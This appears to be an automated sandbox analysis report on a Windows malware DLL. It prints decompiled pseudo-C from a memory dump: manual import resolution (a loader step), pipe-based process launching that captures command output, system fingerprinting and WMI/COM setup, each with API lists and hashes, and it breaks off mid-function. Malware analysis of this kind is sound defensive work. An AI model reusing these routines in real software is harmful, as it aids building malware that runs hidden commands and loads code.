                                    											}
                                    										}
                                    										_t93 = _a12;
                                    										__eflags = _t93;
                                    										if(_t93 != 0) {
                                    											 *_t93 = _v1104;
                                    										}
                                    										_t192 = 0;
                                    										__eflags = 0;
                                    										goto L41;
                                    									}
                                    									_t51 = _t91 + 0x228; // 0x79007b8
                                    									_t153 = _t51;
                                    									L25:
                                    									_t90 = E1000553F(_t153, _t130, __eflags);
                                    									L26:
                                    									__eflags = _t90;
                                    									if(_t90 >= 0) {
                                    										_t91 =  *0x1001e688; // 0x7900590
                                    										goto L32;
                                    									}
                                    									_push(0xfffffffd);
                                    									L6:
                                    									_pop(_t192);
                                    									goto L41;
                                    								}
                                    							}
                                    							_t106 = E1000C292(_v1104, __eflags);
                                    							_v1112 = _t106;
                                    							_t107 =  *0x1001e684; // 0x797faa0
                                    							_t108 =  *((intOrPtr*)(_t107 + 0xd0))(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
                                    							__eflags = _t108 - _t192;
                                    							if(_t108 != _t192) {
                                    								_t109 =  *0x1001e684; // 0x797faa0
                                    								 *((intOrPtr*)(_t109 + 0x30))();
                                    								E1000861A( &_v1148, _t192);
                                    								_t145 = _t108;
                                    								goto L17;
                                    							}
                                    							E1000861A( &_v1144, _t192);
                                    							_t81 = 1;
                                    							goto L42;
                                    						}
                                    						_t116 =  *(_t75 + 0x1898);
                                    						__eflags = _t116 & 0x00000004;
                                    						if((_t116 & 0x00000004) == 0) {
                                    							__eflags = _t116;
                                    							if(_t116 != 0) {
                                    								goto L12;
                                    							}
                                    							L11:
                                    							E1000E286(_v1112, _t175);
                                    							goto L12;
                                    						}
                                    						_v1080 = _v1080 & 0x00000000;
                                    						_t118 = E100095E1(_t143, 0x879);
                                    						_v1100 = _t118;
                                    						_t175 = _t118;
                                    						E1000BFEC(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
                                    						E100085D5( &_v1100);
                                    						_t200 = _t200 + 0x14;
                                    						goto L11;
                                    					}
                                    					_push(0xfffffffe);
                                    					goto L6;
                                    				} else {
                                    					_t122 = E10002BA4( &_v1044, _t192, 0x105);
                                    					_t206 = _t122;
                                    					if(_t122 == 0) {
                                    						L41:
                                    						_t81 = _t192;
                                    						L42:
                                    						return _t81;
                                    					}
                                    					goto L4;
                                    				}
                                    			}

                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$memset
                                    • String ID:
                                    • API String ID: 1985475764-0
                                    • Opcode ID: 9c0abdd94eabe914945b90b3f23502be936d310f05b3141c419733170b2e759b
                                    • Instruction ID: f7566e60c9d6103eeec9fdfcf7230380432adf105638aba250afc4f9be1d7fc6
                                    • Opcode Fuzzy Hash: 9c0abdd94eabe914945b90b3f23502be936d310f05b3141c419733170b2e759b
                                    • Instruction Fuzzy Hash: 60919AB5604305AFF314DB20CC86F6E73E9EB84390F12492EF5958B299EF70E9448B56
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • SysAllocString.OLEAUT32(00000000), ref: 1000D75C
                                    • SysAllocString.OLEAUT32(?), ref: 1000D764
                                    • SysAllocString.OLEAUT32(00000000), ref: 1000D778
                                    • SysFreeString.OLEAUT32(?), ref: 1000D7F3
                                    • SysFreeString.OLEAUT32(?), ref: 1000D7F6
                                    • SysFreeString.OLEAUT32(?), ref: 1000D7FB
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: String$AllocFree
                                    • String ID:
                                    • API String ID: 344208780-0
                                    • Opcode ID: 29a52338a57cec81f6671dbadbd3888b240f1232313cc897351bf5da0bc70bfa
                                    • Instruction ID: 27e2c139421265cbd0753a0a77cd0a813644ebbf917d6f260799ceccbc4dcd54
                                    • Opcode Fuzzy Hash: 29a52338a57cec81f6671dbadbd3888b240f1232313cc897351bf5da0bc70bfa
                                    • Instruction Fuzzy Hash: BC21FB75900219BFDB01DFA5CC88DAFBBBDEF48294B10449AF505A7250EA71AE01CB60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: @$\u%04X$\u%04X\u%04X
                                    • API String ID: 0-2132903582
                                    • Opcode ID: 546ce5fa566931b67c5079da5f298430883b327ac1d9d5cea2f582d755a7ec14
                                    • Instruction ID: 18f8f7fd9c3af9e43ea2b41f69ba211a484cfe72345a25ce6a4dcd653cb28466
                                    • Opcode Fuzzy Hash: 546ce5fa566931b67c5079da5f298430883b327ac1d9d5cea2f582d755a7ec14
                                    • Instruction Fuzzy Hash: F1411932B04145A7EB24CA988DA5BAE3AA8DF44384F200115FDC6DE296D6F5CED1C7D1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 30%
                                    			E1000D523(void* __ecx) {
                                    				char _v8;
                                    				void* _v12;
                                    				char* _t15;
                                    				intOrPtr* _t16;
                                    				void* _t21;
                                    				intOrPtr* _t23;
                                    				intOrPtr* _t24;
                                    				intOrPtr* _t25;
                                    				void* _t30;
                                    				void* _t33;
                                    
                                    				_v12 = 0;
                                    				_v8 = 0;
                                    				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
                                    				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
                                    				_t15 =  &_v12;
                                    				__imp__CoCreateInstance(0x1001b848, 0, 1, 0x1001b858, _t15);
                                    				if(_t15 < 0) {
                                    					L5:
                                    					_t23 = _v8;
                                    					if(_t23 != 0) {
                                    						 *((intOrPtr*)( *_t23 + 8))(_t23);
                                    					}
                                    					_t24 = _v12;
                                    					if(_t24 != 0) {
                                    						 *((intOrPtr*)( *_t24 + 8))(_t24);
                                    					}
                                    					_t16 = 0;
                                    				} else {
                                    					__imp__#2(__ecx);
                                    					_t25 = _v12;
                                    					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
                                    					if(_t21 < 0) {
                                    						goto L5;
                                    					} else {
                                    						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
                                    						if(_t21 < 0) {
                                    							goto L5;
                                    						} else {
                                    							_t16 = E10008604(8);
                                    							if(_t16 == 0) {
                                    								goto L5;
                                    							} else {
                                    								 *((intOrPtr*)(_t16 + 4)) = _v12;
                                    								 *_t16 = _v8;
                                    							}
                                    						}
                                    					}
                                    				}
                                    				return _t16;
                                    			}

                                    APIs
                                    • CoInitializeEx.OLE32(00000000,00000000), ref: 1000D536
                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 1000D547
                                    • CoCreateInstance.OLE32(1001B848,00000000,00000001,1001B858,?), ref: 1000D55E
                                    • SysAllocString.OLEAUT32(00000000), ref: 1000D569
                                    • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 1000D594
                                      • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AllocInitialize$BlanketCreateHeapInstanceProxySecurityString
                                    • String ID:
                                    • API String ID: 2855449287-0
                                    • Opcode ID: e3036c98c6c22c681c85725f4620ce73059aed9228951fa92778f01e46537caa
                                    • Instruction ID: 5bbdf4e47082d7f099f202f2147c83233ba5ae9393f0558d240139af4bbb2059
                                    • Opcode Fuzzy Hash: e3036c98c6c22c681c85725f4620ce73059aed9228951fa92778f01e46537caa
                                    • Instruction Fuzzy Hash: A6210931600255BBEB249B66CC4DE6FBFBCEFC6B55F11415EB901A6290DB70DA00CA30
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 79%
                                    			E100121FF(char* __eax, char** _a4, long long* _a8) {
                                    				char* _v8;
                                    				long long _v16;
                                    				char* _t9;
                                    				signed char _t11;
                                    				char** _t19;
                                    				char _t22;
                                    				long long _t32;
                                    				long long _t33;
                                    
                                    				_t9 = __eax;
                                    				L100122CD();
                                    				_t19 = _a4;
                                    				_t22 =  *__eax;
                                    				if( *_t22 != 0x2e) {
                                    					_t9 = strchr( *_t19, 0x2e);
                                    					if(_t9 != 0) {
                                    						 *_t9 =  *_t22;
                                    					}
                                    				}
                                    				L10012291();
                                    				 *_t9 =  *_t9 & 0x00000000;
                                    				_t11 = strtod( *_t19,  &_v8);
                                    				asm("fst qword [ebp-0xc]");
                                    				_t32 =  *0x10018250;
                                    				asm("fucomp st1");
                                    				asm("fnstsw ax");
                                    				if((_t11 & 0x00000044) != 0) {
                                    					L5:
                                    					st0 = _t32;
                                    					L10012291();
                                    					if( *_t11 != 0x22) {
                                    						_t33 = _v16;
                                    						goto L8;
                                    					} else {
                                    						return _t11 | 0xffffffff;
                                    					}
                                    				} else {
                                    					_t33 =  *0x10018258;
                                    					asm("fucomp st1");
                                    					asm("fnstsw ax");
                                    					if((_t11 & 0x00000044) != 0) {
                                    						L8:
                                    						 *_a8 = _t33;
                                    						return 0;
                                    					} else {
                                    						goto L5;
                                    					}
                                    				}
                                    			}

                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: _errno$localeconvstrchrstrtod
                                    • String ID:
                                    • API String ID: 1035490122-0
                                    • Opcode ID: 92f26e4a364c3d80a29fdd1e2403d26020c0f2beabb2bc5ff205f5abd7f33c48
                                    • Instruction ID: a7fe3fef6b6346813f09e77c4cbf996122cf10ff1875fbe8eea6711f7156c08d
                                    • Opcode Fuzzy Hash: 92f26e4a364c3d80a29fdd1e2403d26020c0f2beabb2bc5ff205f5abd7f33c48
                                    • Instruction Fuzzy Hash: 5D0124B9900145FADB02AF20E90168D3BA4EF463A0F3141C0E9806E1A1CB75D9F4C7A0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 94%
                                    			E1000CF84(void* __ecx) {
                                    				intOrPtr _t11;
                                    				long _t12;
                                    				intOrPtr _t17;
                                    				intOrPtr _t18;
                                    				struct _OSVERSIONINFOA* _t29;
                                    
                                    				_push(__ecx);
                                    				_t29 =  *0x1001e688; // 0x7900590
                                    				GetCurrentProcess();
                                    				_t11 = E1000BA05();
                                    				_t1 = _t29 + 0x1644; // 0x7901bd4
                                    				_t25 = _t1;
                                    				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
                                    				_t12 = GetModuleFileNameW(0, _t1, 0x105);
                                    				_t33 = _t12;
                                    				if(_t12 != 0) {
                                    					_t12 = E10008FBE(_t25, _t33);
                                    				}
                                    				_t3 = _t29 + 0x228; // 0x79007b8
                                    				 *(_t29 + 0x1854) = _t12;
                                    				 *((intOrPtr*)(_t29 + 0x434)) = E10008FBE(_t3, _t33);
                                    				memset(_t29, 0, 0x9c);
                                    				_t29->dwOSVersionInfoSize = 0x9c;
                                    				GetVersionExA(_t29);
                                    				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
                                    				_t17 = E1000E3B6(_t3);
                                    				_t7 = _t29 + 0x220; // 0x79007b0
                                    				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
                                    				_t18 = E1000E3F1(_t7);
                                    				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
                                    				return _t18;
                                    			}

                                    APIs
                                    • GetCurrentProcess.KERNEL32(?,?,07900590,?,10003545), ref: 1000CF90
                                    • GetModuleFileNameW.KERNEL32(00000000,07901BD4,00000105,?,?,07900590,?,10003545), ref: 1000CFB1
                                    • memset.MSVCRT ref: 1000CFE2
                                    • GetVersionExA.KERNEL32(07900590,07900590,?,10003545), ref: 1000CFED
                                    • GetCurrentProcessId.KERNEL32(?,10003545), ref: 1000CFF3
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CurrentProcess$FileModuleNameVersionmemset
                                    • String ID:
                                    • API String ID: 3581039275-0
                                    • Opcode ID: c3299e6d2f0b03601ba1cf598394421de32a902fba2cc4fff372b1365d944c65
                                    • Instruction ID: 6868e59ac51cffefd4345363f154aaa4011aa3255cd34e47fa6660c1185ef8f7
                                    • Opcode Fuzzy Hash: c3299e6d2f0b03601ba1cf598394421de32a902fba2cc4fff372b1365d944c65
                                    • Instruction Fuzzy Hash: ED015E749017149BE720DF70888AAEABBE5FF95350F00082DF59687251EB74B744CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 73%
                                    			E1000A9B7(signed int __ecx) {
                                    				void* _v8;
                                    				void* _v12;
                                    				void* _v16;
                                    				void* _v20;
                                    				signed int _v24;
                                    				char _v28;
                                    				char _v32;
                                    				char _v36;
                                    				struct _SECURITY_ATTRIBUTES _v48;
                                    				intOrPtr _v60;
                                    				char _v64;
                                    				intOrPtr _v76;
                                    				intOrPtr _v80;
                                    				void* _v84;
                                    				short _v92;
                                    				intOrPtr _v96;
                                    				void _v140;
                                    				intOrPtr _t77;
                                    				void* _t79;
                                    				intOrPtr _t85;
                                    				intOrPtr _t87;
                                    				intOrPtr _t89;
                                    				intOrPtr _t92;
                                    				intOrPtr _t98;
                                    				intOrPtr _t100;
                                    				intOrPtr _t102;
                                    				long _t111;
                                    				intOrPtr _t115;
                                    				intOrPtr _t126;
                                    				void* _t127;
                                    				void* _t128;
                                    				void* _t129;
                                    				void* _t130;
                                    
                                    				_t111 = 0;
                                    				_v24 = __ecx;
                                    				_v12 = 0;
                                    				_v20 = 0;
                                    				_t127 = 0;
                                    				_v8 = 0;
                                    				_v16 = 0;
                                    				_v48.nLength = 0xc;
                                    				_v48.lpSecurityDescriptor = 0;
                                    				_v48.bInheritHandle = 1;
                                    				_v28 = 0;
                                    				memset( &_v140, 0, 0x44);
                                    				asm("stosd");
                                    				_t130 = _t129 + 0xc;
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
                                    					L18:
                                    					return 0;
                                    				}
                                    				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
                                    					L13:
                                    					E1000861A( &_v28, 0);
                                    					if(_v20 != 0) {
                                    						_t77 =  *0x1001e684; // 0x797faa0
                                    						 *((intOrPtr*)(_t77 + 0x30))(_v20);
                                    					}
                                    					if(_v8 != 0) {
                                    						_t115 =  *0x1001e684; // 0x797faa0
                                    						 *((intOrPtr*)(_t115 + 0x30))(_v8);
                                    					}
                                    					return _t111;
                                    				}
                                    				_t79 = _v16;
                                    				_v76 = _t79;
                                    				_v80 = _t79;
                                    				_v84 = _v12;
                                    				_v140 = 0x44;
                                    				_v96 = 0x101;
                                    				_v92 = 0;
                                    				_t126 = E10008604(0x1001);
                                    				_v28 = _t126;
                                    				if(_t126 == 0) {
                                    					goto L18;
                                    				}
                                    				_push( &_v64);
                                    				_push( &_v140);
                                    				_t85 =  *0x1001e684; // 0x797faa0
                                    				_push(0);
                                    				_push(0);
                                    				_push(0x8000000);
                                    				_push(1);
                                    				_push(0);
                                    				_push(0);
                                    				_push(_v24);
                                    				_push(0);
                                    				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
                                    					goto L13;
                                    				}
                                    				_t87 =  *0x1001e684; // 0x797faa0
                                    				 *((intOrPtr*)(_t87 + 0x30))(_v12);
                                    				_t89 =  *0x1001e684; // 0x797faa0
                                    				 *((intOrPtr*)(_t89 + 0x30))(_v16);
                                    				_v24 = _v24 & 0;
                                    				do {
                                    					_t92 =  *0x1001e684; // 0x797faa0
                                    					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
                                    					 *((char*)(_v24 + _t126)) = 0;
                                    					if(_t111 == 0) {
                                    						_t127 = E100091A6(_t126, 0);
                                    					} else {
                                    						_push(0);
                                    						_push(_t126);
                                    						_v32 = _t127;
                                    						_t127 = E10009292(_t127);
                                    						E1000861A( &_v32, 0xffffffff);
                                    						_t130 = _t130 + 0x14;
                                    					}
                                    					_t111 = _t127;
                                    					_v32 = _t127;
                                    				} while (_v36 != 0);
                                    				_push( &_v36);
                                    				_push(E1000C379(_t127));
                                    				_t98 =  *0x1001e68c; // 0x797fc68
                                    				_push(_t127);
                                    				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
                                    					L12:
                                    					_t100 =  *0x1001e684; // 0x797faa0
                                    					 *((intOrPtr*)(_t100 + 0x30))(_v64);
                                    					_t102 =  *0x1001e684; // 0x797faa0
                                    					 *((intOrPtr*)(_t102 + 0x30))(_v60);
                                    					goto L13;
                                    				}
                                    				_t128 = E10009256(_t127);
                                    				if(_t128 == 0) {
                                    					goto L12;
                                    				}
                                    				E1000861A( &_v32, 0);
                                    				return _t128;
                                    			}

                                    APIs
                                    • memset.MSVCRT ref: 1000A9F4
                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 1000AA18
                                    • CreatePipe.KERNEL32(100065A9,?,0000000C,00000000), ref: 1000AA2F
                                      • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                                      • Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CreateHeapPipe$AllocFreememset
                                    • String ID: D
                                    • API String ID: 488076629-2746444292
                                    • Opcode ID: 24234036bd44549ce90901f02aea0baf555124e47afd939409f04462bb315129
                                    • Instruction ID: bbbe2e048bdb7ca281e90c8594452977dd6133e52a65fc6598db3d6a90d98c7d
                                    • Opcode Fuzzy Hash: 24234036bd44549ce90901f02aea0baf555124e47afd939409f04462bb315129
                                    • Instruction Fuzzy Hash: DA512871D00219AFEB41CFA4CC85FDEBBB9FB08380F514169F604E7255EB75AA448B61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 50%
                                    			E1001249B(signed int __eax, intOrPtr _a4) {
                                    				intOrPtr* _v8;
                                    				signed int* _v12;
                                    				signed int _v16;
                                    				signed int _v20;
                                    				signed int _v24;
                                    				signed int _v28;
                                    				intOrPtr _v32;
                                    				struct HINSTANCE__* _v36;
                                    				intOrPtr _v40;
                                    				signed int _v44;
                                    				struct HINSTANCE__* _v48;
                                    				intOrPtr _v52;
                                    				signed int _v56;
                                    				intOrPtr _v60;
                                    				signed int _v64;
                                    				signed int _t109;
                                    				signed int _t112;
                                    				signed int _t115;
                                    				void* _t163;
                                    
                                    				_v44 = _v44 & 0x00000000;
                                    				if(_a4 != 0) {
                                    					_v48 = GetModuleHandleA("kernel32.dll");
                                    					_v40 = E1000E099(_v48, "GetProcAddress");
                                    					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                                    					_v32 = _v52;
                                    					_t109 = 8;
                                    					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
                                    						L24:
                                    						return 0;
                                    					}
                                    					_v56 = 0x80000000;
                                    					_t112 = 8;
                                    					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
                                    					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                    						_v8 = _v8 + 0x14;
                                    					}
                                    					_t115 = 8;
                                    					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
                                    					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                    						_v36 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4);
                                    						if(_v36 != 0) {
                                    							if( *_v8 == 0) {
                                    								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
                                    							} else {
                                    								_v12 =  *_v8 + _a4;
                                    							}
                                    							_v28 = _v28 & 0x00000000;
                                    							while( *_v12 != 0) {
                                    								_v24 = _v24 & 0x00000000;
                                    								_v16 = _v16 & 0x00000000;
                                    								_v64 = _v64 & 0x00000000;
                                    								_v20 = _v20 & 0x00000000;
                                    								if(( *_v12 & _v56) == 0) {
                                    									_v60 =  *_v12 + _a4;
                                    									_v20 = _v60 + 2;
                                    									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
                                    									_v16 = _v40(_v36, _v20);
                                    								} else {
                                    									_v24 =  *_v12;
                                    									_v20 = _v24 & 0x0000ffff;
                                    									_v16 = _v40(_v36, _v20);
                                    								}
                                    								if(_v24 != _v16) {
                                    									_v44 = _v44 + 1;
                                    									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
                                    										 *_v12 = _v16;
                                    									} else {
                                    										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
                                    									}
                                    								}
                                    								_v12 =  &(_v12[1]);
                                    								_v28 = _v28 + 4;
                                    							}
                                    							_v8 = _v8 + 0x14;
                                    							continue;
                                    						}
                                    						_t163 = 0xfffffffd;
                                    						return _t163;
                                    					}
                                    					goto L24;
                                    				}
                                    				return __eax | 0xffffffff;
                                    			}

                                    APIs
                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 100124B8
                                    • LoadLibraryA.KERNEL32(00000000), ref: 10012551
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: HandleLibraryLoadModule
                                    • String ID: GetProcAddress$kernel32.dll
                                    • API String ID: 4133054770-1584408056
                                    • Opcode ID: aaea8c4d1095c55f87203bc05215dd3fb8d347464425403934247a8dda217c55
                                    • Instruction ID: 32dcb2393de001d92d0e2ea9b2cd9e3cf8e07861903f3f539e44592daf5cdc58
                                    • Opcode Fuzzy Hash: aaea8c4d1095c55f87203bc05215dd3fb8d347464425403934247a8dda217c55
                                    • Instruction Fuzzy Hash: 7A617AB5D00209EFDB40CF98C881BADBBF1FF08355F208599E815AB2A1C774AA90DF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 89%
                                    			E1000C4CE(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                    				char _v8;
                                    				char _v12;
                                    				void _v140;
                                    				signed char _t14;
                                    				char _t15;
                                    				intOrPtr _t20;
                                    				void* _t25;
                                    				intOrPtr _t26;
                                    				intOrPtr _t32;
                                    				WCHAR* _t34;
                                    				intOrPtr _t35;
                                    				struct HINSTANCE__* _t37;
                                    				int _t38;
                                    				intOrPtr _t46;
                                    				void* _t47;
                                    				intOrPtr _t50;
                                    				void* _t60;
                                    				void* _t61;
                                    				char _t62;
                                    				char* _t63;
                                    				void* _t65;
                                    				intOrPtr _t66;
                                    				char _t68;
                                    
                                    				_t65 = __esi;
                                    				_t61 = __edi;
                                    				_t47 = __ebx;
                                    				_t50 =  *0x1001e688; // 0x7900590
                                    				_t14 =  *(_t50 + 0x1898);
                                    				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
                                    					_t15 = E100095E1(_t50, 0xb62);
                                    					_t66 =  *0x1001e688; // 0x7900590
                                    					_t62 = _t15;
                                    					_t67 = _t66 + 0xb0;
                                    					_v8 = _t62;
                                    					E10009640( &_v140, 0x40, L"%08x", E1000D400(_t66 + 0xb0, E1000C379(_t66 + 0xb0), 0));
                                    					_t20 =  *0x1001e688; // 0x7900590
                                    					asm("sbb eax, eax");
                                    					_t25 = E100095E1(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
                                    					_t63 = "\\";
                                    					_t26 =  *0x1001e688; // 0x7900590
                                    					_t68 = E100092E5(_t26 + 0x1020);
                                    					_v12 = _t68;
                                    					E100085D5( &_v8);
                                    					_t32 =  *0x1001e688; // 0x7900590
                                    					_t34 = E100092E5(_t32 + 0x122a);
                                    					 *0x1001e784 = _t34;
                                    					_t35 =  *0x1001e684; // 0x797faa0
                                    					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
                                    					_t37 = LoadLibraryW( *0x1001e784);
                                    					 *0x1001e77c = _t37;
                                    					if(_t37 == 0) {
                                    						_t38 = 0;
                                    					} else {
                                    						_push(_t37);
                                    						_t60 = 0x28;
                                    						_t38 = E1000E171(0x1001bb48, _t60);
                                    					}
                                    					 *0x1001e780 = _t38;
                                    					E1000861A( &_v12, 0xfffffffe);
                                    					memset( &_v140, 0, 0x80);
                                    					if( *0x1001e780 != 0) {
                                    						goto L10;
                                    					} else {
                                    						E1000861A(0x1001e784, 0xfffffffe);
                                    						goto L8;
                                    					}
                                    				} else {
                                    					L8:
                                    					if( *0x1001e780 == 0) {
                                    						_t46 =  *0x1001e6bc; // 0x797fbc8
                                    						 *0x1001e780 = _t46;
                                    					}
                                    					L10:
                                    					return 1;
                                    				}
                                    			}

                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp
                                    Similarity
                                    • API ID: LibraryLoadmemset
                                    • String ID: %08x$dll
                                    • API String ID: 3406617148-2963171978
                                    • Opcode ID: 43948bddfd1750ecd2ded6eac0453c4b4ed6b088884f12521d2ac14b5d2ae194
                                    • Instruction ID: 605655cd81f1f69b7fa92b991eeeb1d6cfabf96bce0b9214bc1f1ebdb38bd664
                                    • Opcode Fuzzy Hash: 43948bddfd1750ecd2ded6eac0453c4b4ed6b088884f12521d2ac14b5d2ae194
                                    • Instruction Fuzzy Hash: 3331E3B2904358ABFB10CBA4DC89F9E33ECEB58394F408029F105E7191EB35EE818724
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 99%
                                    			E10012D70(int _a4, signed int _a8) {
                                    				int _v8;
                                    				intOrPtr _v12;
                                    				signed int _v16;
                                    				void* __esi;
                                    				void* _t137;
                                    				signed int _t141;
                                    				intOrPtr* _t142;
                                    				signed int _t145;
                                    				signed int _t146;
                                    				intOrPtr _t151;
                                    				intOrPtr _t161;
                                    				intOrPtr _t162;
                                    				intOrPtr _t167;
                                    				intOrPtr _t170;
                                    				signed int _t172;
                                    				intOrPtr _t173;
                                    				int _t184;
                                    				intOrPtr _t185;
                                    				intOrPtr _t188;
                                    				signed int _t189;
                                    				void* _t195;
                                    				int _t202;
                                    				int _t208;
                                    				intOrPtr _t217;
                                    				signed int _t218;
                                    				int _t219;
                                    				intOrPtr _t220;
                                    				signed int _t221;
                                    				signed int _t222;
                                    				int _t224;
                                    				int _t225;
                                    				signed int _t227;
                                    				intOrPtr _t228;
                                    				int _t232;
                                    				int _t234;
                                    				signed int _t235;
                                    				int _t239;
                                    				void* _t240;
                                    				int _t245;
                                    				int _t252;
                                    				signed int _t253;
                                    				int _t254;
                                    				void* _t257;
                                    				void* _t258;
                                    				int _t259;
                                    				intOrPtr _t260;
                                    				int _t261;
                                    				signed int _t269;
                                    				signed int _t271;
                                    				intOrPtr* _t272;
                                    				void* _t273;
                                    
                                    				_t253 = _a8;
                                    				_t272 = _a4;
                                    				_t3 = _t272 + 0xc; // 0x452bf84d
                                    				_t4 = _t272 + 0x2c; // 0x8df075ff
                                    				_t228 =  *_t4;
                                    				_t137 =  *_t3 + 0xfffffffb;
                                    				_t229 =  <=  ? _t137 : _t228;
                                    				_v16 =  <=  ? _t137 : _t228;
                                    				_t269 = 0;
                                    				_a4 =  *((intOrPtr*)( *_t272 + 4));
                                    				asm("o16 nop [eax+eax]");
                                    				while(1) {
                                    					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
                                    					_t141 =  *_t8 + 0x2a >> 3;
                                    					_v12 = 0xffff;
                                    					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
                                    					if(_t217 < _t141) {
                                    						break;
                                    					}
                                    					_t11 = _t272 + 0x6c; // 0xa1ec8b55
                                    					_t12 = _t272 + 0x5c; // 0x84e85000
                                    					_t245 =  *_t11 -  *_t12;
                                    					_v8 = _t245;
                                    					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
                                    					_t247 =  <  ? _t195 : _v12;
                                    					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
